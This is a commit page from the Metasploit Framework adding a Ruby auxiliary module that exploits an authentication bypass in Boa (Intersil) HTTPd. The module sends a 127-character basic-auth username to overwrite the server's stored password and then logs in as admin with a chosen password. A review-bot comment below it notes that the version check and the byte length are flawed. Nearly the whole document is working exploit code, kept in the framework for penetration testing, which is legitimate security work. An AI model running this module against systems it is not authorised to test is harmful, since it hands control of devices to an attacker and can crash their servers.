
Add Intersil HTTP Basic auth pass reset (originally #453)

The modified version of pull request #453. This addresses a couple
of things including:
* Change the description to better explain what the vulnerability is.
  The advisory focuses the problem as an auth bypass, not DoS,
  although it can end up dosing the server.
* The title and filename are changed as a result of matching that
  advisory's description.
* Use 'TARGETURI' option instead of 'URI'.
* The reset attempt needs to check if the directory actually has
  401 in place, otherwise this may result in a false positive.
* The last HTTP request needs to check a possible nil return value.
* More verbose outputs.
commit e72303a9224ca71c2dbfbf4aaae9d7130cece89a 1 parent bf45de1
sinn3r authored

Showing 1 changed file with 114 additions and 0 deletions.

  1. +114 0 modules/auxiliary/admin/http/intersil_pass_reset.rb
114 modules/auxiliary/admin/http/intersil_pass_reset.rb
... ... @@ -0,0 +1,114 @@
  1 +##
  2 +# This file is part of the Metasploit Framework and may be subject to
  3 +# redistribution and commercial restrictions. Please see the Metasploit
  4 +# web site for more information on licensing and terms of use.
  5 +# http://metasploit.com/
  6 +##
  7 +
  8 +require 'msf/core'
  9 +
  10 +class Metasploit3 < Msf::Auxiliary
  11 +
  12 + include Msf::Exploit::Remote::HttpClient
  13 +
  14 + def initialize(info = {})
  15 + super(update_info(info,
  16 + 'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
  17 + 'Description' => %q{
  18 + The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
  19 + allows basic authentication bypass when the user string is greater
  20 + than 127 bytes long. The long string causes the password to be
  21 + overwritten in memory, which enables the attacker to reset the
  22 + password. In addition, the malicious attempt also may cause a
  23 + denial-of-service condition.
  24 +
  25 + Please note that you must set the request URI to the directory that
  26 + requires basic authentication in order to work properly.
  27 + },
  28 + 'Author' =>
  29 + [
  30 + 'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
  31 + 'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
  32 + 'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
  33 + ],
  34 + 'License' => MSF_LICENSE,
  35 + 'References' =>
  36 + [
  37 + [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html']
  38 + ],
  39 + 'DisclosureDate' => 'Sep 10 2007'))
  40 +
  41 + register_options(
  42 + [
  43 + OptString.new('TARGETURI', [ true, "The request URI", '/']),
  44 + OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
  45 + ], self.class)
  46 + end
  47 +
  48 + def check
  49 + begin
  50 + res = send_request_cgi({
  51 + 'uri'=>'/',
  52 + 'method'=>'GET'
  53 + })
  54 +
  55 + if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
  56 + print_status("#{@peer} - Boa Version Detected: #{m[1]}")
  57 + return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
  58 + return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
  59 + return Exploit::CheckCode::Vulnerable
  60 + else
  61 + print_status("#{@peer} - Not a Boa Server!")
  62 + return Exploit::CheckCode::Safe # not a boa server
  63 + end
  64 +
  65 + rescue Rex::ConnectionRefused
  66 + print_error("#{@peer} - Connection refused by server.")
  67 + return Exploit::CheckCode::Safe
  68 + end
  69 + end
  70 +
  71 + def run
  72 + @peer = "#{rhost}:#{rport}"
  73 + return if check != Exploit::CheckCode::Vulnerable
  74 +
  75 + uri = target_uri.path
  76 + uri << '/' if uri[-1,1] != '/'
  77 +
  78 + res = send_request_cgi({
  79 + 'uri'=> uri,
  80 + 'method'=>'GET',
  81 + 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}"
  82 + })
  83 +
  84 + if res.nil?
  85 + print_error("#{@peer} - The server may be down")
  86 + return
  87 + elsif res and res.code != 401
  88 + print_status("#{@peer} - #{uri} does not have basic authentication enabled")
  89 + return
  90 + end
  91 +
  92 + print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
  93 + res = send_request_cgi({
  94 + 'uri' => uri,
  95 + 'method'=> 'GET',
  96 + 'basic_auth' => "admin:#{datastore['PASSWORD']}"
  97 + })
  98 +
  99 + if not res
  100 + print_error("#{@peer} - Server timedout, will not continue")
  101 + return
  102 + end
  103 +
  104 + case res.code
  105 + when 200
  106 + print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
  107 + when 401
  108 + print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
  109 + else
  110 + print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
  111 + end
  112 +
  113 + end
  114 +end
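Review bot: the version gate in check (`return Exploit::CheckCode::Safe if (m[1][0].ord-48>0)` and `return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)`) compares single characters of the banner rather than the version, so it does not implement the "0.93.x - 0.94.11" range stated in the description: 0.94.12 and later are still reported Vulnerable, anything below 0.93 is too, and a short banner such as `Boa/0.9` makes `m[1][3]` nil and raises NoMethodError. Suggest capturing the components with `/Boa\/(\d+)\.(\d+)\.(\d+)/` and comparing them as integers (or via Gem::Version) against the documented range. In the same method, `res.headers['Server'].match(...)` raises when the Server header is absent, so the "Not a Boa Server!" branch is never reached for such hosts; use `res.headers['Server'].to_s.match(...)`. The `rescue Rex::ConnectionRefused` branch returns Safe, which conflates "could not connect" with "not vulnerable"; Exploit::CheckCode::Unknown is the appropriate result, and other connection failures (timeouts) are not rescued at all. Two smaller points in run: the description says the user string must be greater than 127 bytes, but `Rex::Text.rand_text_alpha(127)` sends exactly 127, so one of the two should be adjusted; and `elsif res and res.code != 401` repeats the nil check already done on the line above and can be just `elsif res.code != 401`.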

0 comments on commit e72303a
